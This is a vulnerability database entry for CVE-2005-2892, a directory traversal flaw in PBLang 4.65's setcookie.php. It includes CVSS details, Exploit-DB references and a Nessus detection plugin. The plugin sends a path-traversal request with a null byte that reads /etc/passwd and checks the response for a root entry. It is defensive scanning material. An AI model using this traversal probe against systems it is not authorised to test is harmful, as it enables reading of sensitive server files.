Vulnerabilities > CVE-2005-2892 - Directory Traversal vulnerability in Pblang 4.65

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
pblang
nessus
exploit available

Summary

Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.

Vulnerable Configurations

Part Description Count
Application
Pblang
1

Exploit-Db

  • description: PBLang Local file include Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    id: EDB-ID:18590
    last seen: 2016-02-02
    modified: 2012-03-13
    published: 2012-03-13
    reporter: Number 7
    source: https://www.exploit-db.com/download/18590/
    title: PBLang Local file include Vulnerability
  • description: PBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    id: EDB-ID:26231
    last seen: 2016-02-03
    modified: 2005-09-07
    published: 2005-09-07
    reporter: rgod
    source: https://www.exploit-db.com/download/26231/
    title: PBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability

Nessus

NASL family: CGI abuses
NASL id: PBLANG_MULT_FLAWS.NASL
description: The remote host is running PBLang, a bulletin board system that uses flat files and is written in PHP. The version of PBLang installed on the remote host suffers from several vulnerabilities, including remote code execution, information disclosure, cross-site scripting, and path disclosure.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 19594
published: 2005-09-08
reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/19594
title: PBLang 4.65 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  # Plugin identity.
  script_id(19594);
  script_version("1.21");

  # Every flaw this one check speaks for: the setcookie.php traversal
  # (CVE-2005-2892) plus the other PBLang 4.65 issues disclosed with it.
  script_cve_id("CVE-2005-2892", "CVE-2005-2893", "CVE-2005-2894", "CVE-2005-2895");
  script_bugtraq_id(14765, 14766);

  script_name(english:"PBLang 4.65 Multiple Vulnerabilities");

  # Report text shown to the user.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple flaws." );
  script_set_attribute(attribute:"description", value:
"The remote host is running PBLang, a bulletin board system that uses
flat files and is written in PHP. 

The version of PBLang installed on the remote suffers from several
vulnerabilities, including remote code execution, information
disclosure, cross-site scripting, and path disclosure." );
  # Original advisory (archived):
  # https://web.archive.org/web/20120402152849/http://retrogod.altervista.org/pblang465.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?86f6e038");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Sep/77");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time." );

  # Risk scoring. NOTE(review): the base vector (C:P/I:P/A:P) is the
  # aggregate for all four CVEs; CVE-2005-2892 on its own is rated
  # C:P/I:N/A:N, so a reader should not take this as the per-CVE score.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # NOTE(review): public Exploit-DB entries (EDB-ID 18590, 26231) exist for
  # CVE-2005-2892; "false" here looks stale — confirm before relying on it.
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  # Timeline and plugin type; attributes must all be set before
  # script_end_attributes().
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/09/08");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/06");
  script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # Scheduling: an active (ACT_ATTACK) CGI check that only runs once the
  # web server has been fingerprinted and PHP support is known.
  script_summary(english:"Checks for multiple vulnerabilities in PBLang");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
# Nothing to test if this web server cannot serve PHP at all.
if (!can_host_php(port:port)) exit(0);

# The request tail is the same for every directory, so build it once:
# setcookie.php is asked for /etc/passwd through its 'u' parameter, the
# trailing %00 cutting off whatever the script appends to the path.
probe = string(
  "/setcookie.php?",
  "u=../../../../../../../../../../../../etc/passwd%00&",
  "plugin=", SCRIPT_NAME
);

# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  res = http_send_recv3(method: "GET", item:string(dir, probe), port:port);
  # No response at all means the server stopped answering: stop here
  # rather than probing further directories.
  if (isnull(res)) exit(0);

  body = res[2];
  # A root entry in the response body shows the file was really read.
  if (egrep(string: body, pattern: "root:.*:0:[01]:")) {
    security_hole(port);
    # Presumably set because the same install is also affected by the
    # cross-site scripting flaws this plugin covers, so other plugins can
    # pick it up from the KB — confirm against the consumers of this key.
    set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
    exit(0);
  }
}